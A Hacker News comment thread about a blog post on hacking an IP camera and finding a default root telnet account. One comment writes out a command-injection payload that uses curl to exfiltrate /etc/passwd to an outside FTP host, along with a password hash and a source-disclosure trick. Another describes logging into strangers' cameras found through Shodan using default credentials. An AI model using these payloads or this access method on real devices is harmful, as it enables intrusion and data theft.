
How I hacked my IP camera, and found this backdoor account - dsr12
http://jumpespjump.blogspot.com/2015/09/how-i-hacked-my-ip-camera-and-found.html?m=1
======
lol768
The UCam247 cameras are vulnerable to a similar attack, you can use a closing
quote in the "HTTP Alarm/Periodic Sending" URL field and since this isn't
escaped (and is run at the shell), you can use a URL like this:

    http://127.0.0.1" |sh -c "curl -u user:pass --upload-file /etc/passwd ftp://myserver.com//tmp/ 2>&1

Which gets you this:

    /etc/passwd – root:$1$rnjbbPTD$tR9oAIWgUp/jRrhjDuUwp0:0:0:root:/root:/bin/sh

I haven't been able to crack the password yet, though, so I'm guessing it's
somewhat secure. The good news is that you can only enable telnet via the
config file backup/restore system (and it's disabled by default):

    [telnetd]
    ENABLE=disable
    PORT=60628

The other neat thing about the UCam247 cameras is that they also run the
GoAhead Embedded Web Server (which has some fun vulnerabilities,
[http://www.cvedetails.com/vulnerability-list/vendor_id-1641/...](http://www.cvedetails.com/vulnerability-list/vendor_id-1641/product_id-2833/Goahead-Goahead-Webserver.html)). My
favourite thing to do with this webserver is to append a backslash to the end
of a URL, e.g.
[http://192.168.1.2/en/main.asp%5C](http://192.168.1.2/en/main.asp%5C) - the
webserver will simply return back the source code for the page instead of
interpreting it.

------
Animats
Why do they even bother with a backdoor? In normal operation, it communicates
to the "cloud", really some server in China, so mobile devices can get to
them. It's not clear if the images themselves go there, or just setup to get
through DHCP servers.

Think about that. Somewhere, there's a server farm behind this cheap device.
Who's paying for that? The manufacturer? The PLA? It's like when Microsoft
bought Skype and made all the video go through Microsoft's servers. There's no
benefit to Microsoft in that, but someone wanted access to that video.

~~~
halviti
A backdoor is not for normal operation.

Backdoors like these (when intentional) are for when the device is not
functioning as it should, or the user messed up the device, and now it needs
to be repaired by someone.

I'm not defending this practice by any means, as it's a perfect example of why
not to do this, but the root user was more likely intended for system
maintenance rather than remote viewing of a functioning system.

Also, you misunderstand the server component. It's most likely just a name-
resolution service that allows the device to phone home to allow connections
back through your firewall/router.

If they were sucking up all your video data, the latency would be huge, the
costs would be exponential for the manufacturer, and it would be a huge point
of failure.

------
Phil_Latio
Search on shodan.io for

>GoAhead 5ccc069c403ebaf9f0171e9517f40e41

yields 132,000 devices.

Testing about 100 hosts with admin:123456 gave me 3 working cams. Not all
found devices are cams though. Some allow login with admin:admin and are
routers.

I love this stuff.

~~~
atmosx
shodan.io is so cool that it should be illegal. Gaining remote access should
not be so _easy_ but apparently it is =)

------
lucb1e
> There is an undocumented telnet port on the IP camera, which can be accessed
> by default with root:123456, there is no GUI to change this password, and
> changing it via console, it only lasts until the next reboot. I think it is
> safe to tell this a backdoor.

Backdoor? This is way too obvious for a backdoor. If I wanted a backdoor in my
IP camera product, I'd modify the source of a tool I have to (cross-)compile
anyway. Say I have to compile my own kernel for this device already, I could
add some port knocking which then throws back a live stream upon the last
knock. Or if I have to compile the webserver software, I would add it in
there. All but impossible to come across if you're not looking for it - and
even if someone were, it would be beyond most people's skills.

An additional open port, especially with a password like that, is way too
obvious to be a serious back door. Even if you go for the theory that they
made this backdoor to make it not look like a backdoor, it doesn't make sense:
the device is probably going to be behind NAT, better to put a hidden URL or
something on the already-reachable webserver port.

------
croon
Am I weird if I'm more inclined to buy this specific non-brand camera now
that the author has done all the legwork on it?

The devil you know and all that.

------
discardorama
What would have happened if he just did a "mv /etc/passwd /etc/xyz" instead?
What happens when the system does not have an /etc/passwd? (I'm too lazy to
boot up a VM and check it out). Could he just login as root then, without
password?

~~~
mahouse
As far as I know, if there is no /etc/passwd, there is no root account at all,
so you can't log in.

------
nadams
This is why you should always be careful about black-box devices that you
connect to the internet. It's convenient but extremely risky.

I just discovered that AstroBox runs their web service as root!

------
ksml
I'm not convinced this is an intentional backdoor... Do not attribute to
malice what can be attributed to stupidity

~~~
hanlonbclarke
Any sufficiently advanced stupidity is indistinguishable from malice.

------
natch
If you're looking for a better option, Homeboy is a very nicely done battery
powered smart camera that only records when there is motion.

It only activates when you are not home, which it can tell if you install its
app on your cell phone.

I haven't looked for back doors but they are in Australia and they seem not
very sketchy at all.

~~~
monochromatic
1. Maker is Australian instead of Chinese

2. They "seem not very sketchy"

3. ∴ device is secure.

Logic checks out.

~~~
natch
Except I never said the device was secure.

~~~
xg15
What do you mean then with "better option"?

~~~
natch
I mean it's a more trustworthy and less sketchy product than one from a
company that installs back doors, and which comes from a country with a
draconian political system and utterly idiotic government policies regarding
back doors. Australia probably has some idiotic policies too, but China is a
world leader in stupid when it comes to government interference with user
privacy and human rights, so that sets the tone, intentionally or not, with
companies there that this kind of thing is OK. So, yes, the better option
would be to buy from a company based in a more open, more relatively
democratic, society with better respect for users and their rights.

And, Homeboy has a bug bounty program for people who uncover and report
security problems, so, there's that.

So, that's what I mean. Did that clear it up for you xg15?

------
jand
I don't know if the image in the article is of symbolic nature - anyway - the
small black censorship rectangle does not pose a problem to Google reverse
image search.

So if the author really cares about the company (or the implied company), this
image does not help his case.

EDIT: Oh, neither do the comments on the article page.

